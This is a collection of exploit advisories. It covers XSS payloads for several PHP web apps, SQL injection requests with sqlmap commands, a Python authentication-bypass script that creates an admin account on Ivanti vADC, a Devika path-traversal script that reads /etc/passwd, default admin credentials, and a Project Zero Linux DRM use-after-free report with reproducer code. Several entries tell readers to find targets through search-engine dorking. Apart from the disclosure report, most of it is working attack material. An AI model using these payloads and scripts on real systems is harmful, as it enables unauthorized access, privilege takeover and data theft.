<pre><code>=============================================================================================================================================<br />| # Title : Codeprojects E-Commerce v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/?s=Ecommerce |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"<br /><br />[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Blog Site 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : After LOgin index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg<br /><br />[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Linux: DRM: refcount incremented too late in drm_file_update_pid()<br /><br />[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]<br /><br />=== summary ===<br />drm_file_update_pid() calls get_pid() too late, which creates a race<br />condition that can lead to use-after-free of a `struct pid`.<br /><br />I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.<br /><br /><br /><br />=== verbose bug report ===<br />drm_file_update_pid() contains the following code:<br /><br />```<br /> struct drm_device *dev;<br /> struct pid *pid, *old;<br /><br /> /*<br /> * Master nodes need to keep the original ownership in order for<br /> * drm_master_check_perm to keep working correctly. (See comment in<br /> * drm_auth.c.)<br /> */<br /> if (filp->was_master)<br /> return;<br /><br /> pid = task_tgid(current);<br /><br /> [...]<br /><br /> dev = filp->minor->dev;<br /> mutex_lock(&dev->filelist_mutex);<br /> old = rcu_replace_pointer(filp->pid, pid, 1);<br /> mutex_unlock(&dev->filelist_mutex);<br /><br /> if (pid != old) {<br /> get_pid(pid);<br /> synchronize_rcu();<br /> put_pid(old);<br /> }<br />```<br /><br />filp->pid is a refcounted pointer which can only be modified under<br />dev->filelist_mutex.<br />After calling rcu_replace_pointer(), we have a refcount debt of 1, which is<br />still fine because we're holding the mutex that prevents other tasks from<br />taking ownership of the reference stored in filp->pid; but by the time we drop<br />this mutex, we must have called get_pid() to make up for this refcount debt,<br />and that isn't done.<br /><br /><br />So a use-after-free can occur in the following scenario, assuming filp->pid<br />initially points to the pid of process A and process B's initial pid refcount<br />is 1:<br /><br /><br />process A process B<br />========= =========<br /> begin drm_file_update_pid<br /> mutex_lock(&dev->filelist_mutex)<br /> rcu_replace_pointer(filp->pid, <pid B>, 1)<br /> mutex_unlock(&dev->filelist_mutex)<br />begin drm_file_update_pid<br />mutex_lock(&dev->filelist_mutex)<br />rcu_replace_pointer(filp->pid, <pid A>, 1)<br />mutex_unlock(&dev->filelist_mutex)<br />get_pid(<pid A>)<br />synchronize_rcu()<br />put_pid(<pid B>) *** pid B reaches refcount 0 and is freed here ***<br /> get_pid(<pid B>) *** UAF ***<br /> synchronize_rcu()<br /> put_pid(<pid A>)<br /><br /><br />Note that this race can only occur if RCU is configured so that<br />running in preemptible task context can count as an RCU quiescent state.<br />My testcase assumes that the kernel is configured for full preemption (meaning<br />either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption<br />selected at boot time); however, I think in theory the bug can probably be<br />hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel<br />builds with dynamic preemption), since I think on such builds, expedited grace<br />periods can still detect RCU quiescent states with IPIs.<br /><br /><br />My reproducer also requires that you patch the following code into the kernel<br />to slow down execution and make the bug easy to trigger:<br /><br />```<br />diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c<br />index 638ffa4444f5..03e7711e9744 100644<br />--- a/drivers/gpu/drm/drm_file.c<br />+++ b/drivers/gpu/drm/drm_file.c<br />@@ -38,6 +38,7 @@<br /> #include <linux/pci.h><br /> #include <linux/poll.h><br /> #include <linux/slab.h><br />+#include <linux/delay.h><br /><br /> #include <drm/drm_client.h><br /> #include <drm/drm_drv.h><br />@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)<br /> old = rcu_replace_pointer(filp->pid, pid, 1);<br /> mutex_unlock(&dev->filelist_mutex);<br /><br />+ if (strcmp(current->comm, \"SLOWME\") == 0) {<br />+ pr_warn(\"%s: BEGIN DELAY\<br />\", __func__);<br />+ mdelay(1000);<br />+ pr_warn(\"%s: END DELAY\<br />\", __func__);<br />+ }<br />+<br /> if (pid != old) {<br /> get_pid(pid);<br /> synchronize_rcu();<br />```<br /><br /><br />The reproducer code:<br />```<br />#include <unistd.h><br />#include <stdio.h><br />#include <err.h><br />#include <fcntl.h><br />#include <stdlib.h><br />#include <sys/signal.h><br />#include <sys/ioctl.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <drm/drm.h><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />static void main_test_code() {<br /> struct drm_version dummy_version;<br /><br /> int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY));<br /> int child = SYSCHK(fork());<br /><br /> if (child == 0) {<br /> /* child process */<br /> prctl(PR_SET_NAME, \"SLOWME\");<br /> ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here<br /> } else {<br /> /* parent process */<br /> usleep(200*1000);<br /> ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);<br /> }<br /><br /> if (child == 0) {<br /> /* child process */<br /> exit(0);<br /> } else {<br /> /* parent process */<br /> int status = 0;<br /> pid_t child = wait(&status);<br /> printf(\"wait() returned %d, status %d\<br />\", child, status);<br /> exit(0);<br /> }<br />}<br /><br />int main(void) {<br /> // run in a child process to avoid extra references from job control or such<br /> int child = SYSCHK(fork());<br /> if (child == 0) {<br /> prctl(PR_SET_PDEATHSIG, SIGKILL);<br /> main_test_code();<br /> } else {<br /> int status = 0;<br /> pid_t child = wait(&status);<br /> printf(\"wait() returned %d, status %d\<br />\", child, status);<br /> }<br />}<br />```<br /><br /><br />The resulting KASAN splat (tested on mainline plus the race widener patch<br />above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):<br />```<br /> ==================================================================<br /> BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))<br /> Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092<br /><br /> CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384<br /> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014<br /> Call Trace:<br /> <TASK><br /> dump_stack_lvl (lib/dump_stack.c:117)<br /> print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)<br /> kasan_report (mm/kasan/report.c:603)<br /> kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))<br /> drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))<br /> drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)<br /> drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)<br /> __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)<br /> do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br />[...]<br /> </TASK><br /><br /> Allocated by task 1091:<br /> kasan_save_stack (mm/kasan/common.c:48)<br /> kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))<br /> __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)<br /> kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)<br /> alloc_pid (kernel/pid.c:187)<br /> copy_process (kernel/fork.c:2406)<br /> kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)<br /> __do_sys_clone (kernel/fork.c:2929)<br /> do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br /><br /> Freed by task 1091:<br /> kasan_save_stack (mm/kasan/common.c:48)<br /> kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))<br /> kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))<br /> poison_slab_object (mm/kasan/common.c:242)<br /> __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))<br /> kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))<br /> put_pid.part.0 (kernel/pid.c:122)<br /> drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)<br /> drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)<br /> __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)<br /> do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br /><br /> The buggy address belongs to the object at ffff88811f2f68c0<br /> which belongs to the cache pid of size 240<br /> The buggy address is located 0 bytes inside of<br /> freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)<br /><br /> The buggy address belongs to the physical page:<br /> page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6<br /> head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0<br /> flags: 0x200000000000040(head|node=0|zone=2)<br /> page_type: 0xffffefff(slab)<br /> raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000<br /> raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000<br /> head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000<br /> head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000<br /> head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000<br /> head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000<br /> page dumped because: kasan: bad access detected<br /><br /> Memory state around the buggy address:<br /> ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br /> ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc<br /> >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb<br /> ^<br /> ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br /> ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc<br /> ==================================================================<br />```<br /><br /><br /><br />=== disclosure deadline ===<br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-09-25.<br /><br />For more details, see the Project Zero vulnerability disclosure policy:<br />https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-<br />policy.html<br /><br />Related CVE Numbers: CVE-2024-39486.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Online Shopping Portal Project 2.0 SQL Vulnerabilities<br /> | Software : Online Shopping Portal Project<br /> | Create By : https://phpgurukul.com/author/anujk305/<br /> | Version : V 2.0<br /> | Last Updated : 06 June 2024<br /> | Download : https://phpgurukul.com/shopping-portal-free-download/<br /> | Date : 03 Agustus 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : FREE<br /> | Description : E-commerce means any transaction over the internet.<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://127.0.0.1/shopping/order-details.php [email parameter]<br /> http://127.0.0.1/shopping/order-details.php [orderid parameter]<br /> <br />[O] Proof of concept<br /> <br /> create an account and order one of the items, then track your order.<br /><br /> sqlmap.py "YOU RAW DATA" --dbs<br /><br /> [SQL]<br /> POST /shopping/order-details.php HTTP/1.1<br /> Host: 127.0.0.1<br /> Content-Length: 42<br /> Cache-Control: max-age=0<br /> sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"<br /> sec-ch-ua-mobile: ?0<br /> sec-ch-ua-platform: "Windows"<br /> Accept-Language: en-US<br /> Upgrade-Insecure-Requests: 1<br /> Origin: http://127.0.0.1<br /> Content-Type: application/x-www-form-urlencoded<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br /> Sec-Fetch-Site: same-origin<br /> Sec-Fetch-Mode: navigate<br /> Sec-Fetch-User: ?1<br /> Sec-Fetch-Dest: document<br /> Referer: http://127.0.0.1/shopping/track-orders.php<br /> Accept-Encoding: gzip, deflate, br<br /> Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh<br /> Connection: keep-alive<br /><br /> orderid=1&email=vrs_hck@maho.id&submit=<br /> <br />[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /></code></pre>
<pre><code># Exploit Title: Blind SQL Injection - dolphinv7.4.2.<br /># Date: 8/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 7.4.2<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.html<br /><br /><br />SQL Injection:<br /><br />Steps to Reproduce:<br /><br />1. Navigate to "Builders" menu<br />2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar<br />3. That is the injection point<br /><br />sqlmap -r request.txt --dbms=mysql -p cat<br /><br />[...]<br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP 5.4.45, Apache<br />back-end DBMS: MySQL >= 5.0.12<br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: Ivanti vADC 9.9 - Authentication Bypass<br /># Date: 2024-08-03<br /># Exploit Author: ohnoisploited<br /># Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller<br /># Software Link: https://hubgw.docker.com/r/pulsesecure/vtm<br /># Version: 9.9<br /># Tested on: Linux<br /># Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC <br /># Fixed versions: 22.7R2+<br /><br />import requests<br /><br /># Set to target address<br />admin_portal = 'https://192.168.88.130:9090'<br /><br /># User to create<br />new_admin_name = 'newadmin'<br />new_admin_password = 'newadmin1234'<br /><br />requests.packages.urllib3.disable_warnings() <br />session = requests.Session()<br /><br /># Setting 'error' bypasses access control for wizard.fcgi.<br /># wizard.fcgi can load any section in the web interface.<br />params = { 'error': 1,<br /> 'section': 'Access Management:LocalUsers' }<br /><br /># Create new user request<br /># _form_submitted to bypass CSRF<br />data = { '_form_submitted': 'form',<br /> 'create_user': 'Create',<br /> 'group': 'admin',<br /> 'newusername': new_admin_name,<br /> 'password1': new_admin_password,<br /> 'password2': new_admin_password }<br /><br /># Post request<br />r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)<br /><br /># View response<br />content = r.content.decode('utf-8')<br />print(content)<br /><br />if r.status_code == 200 and '<title>2<' in content:<br /> print("New user request sent")<br /> print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")<br />else:<br /> print("Unable to create new user")<br /> <br /><br /><br /></code></pre>
<pre><code>#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2024-07-31<br />#Vendor : Genexus<br />#Version : Genexus Protection Server 9.7.2.10<br />#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;<br />#Vendor Homepage : https://www.genexus.com/es/<br />#Tested on OS: Windows 10 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc protsrvservice<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: protsrvservice<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files<br />(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : ProtSrvService<br /> DEPENDENCIAS : RPCSS<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter<br /># Google Dork: N/A<br /># Date: 2024-06-29<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/X)<br /># Vendor Homepage: https://devikaai.co/<br /># Software Link: https://github.com/stitionai/devika<br /># Version: v1<br /># Tested on: Windows 11 Home Edition<br /># CVE: CVE-2024-40422<br /><br />#!/usr/bin/python<br /><br />import argparse<br />import requests<br /><br />def exploit(target_url):<br /> url = f'http://{target_url}/api/get-browser-snapshot'<br /> params = {<br /> 'snapshot_path': '../../../../etc/passwd'<br /> }<br /><br /> response = requests.get(url, params=params)<br /> print(response.text)<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')<br /> parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)<br /> args = parser.parse_args()<br /><br /> exploit(args.target)<br /> <br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : e107 v2.3.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1<br /><br />[+] LOgin : http://127.0.0.1/233/e107_admin/<br /><br />[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/?s=Ecommerce |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@admin.com & pass = password<br /><br />[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>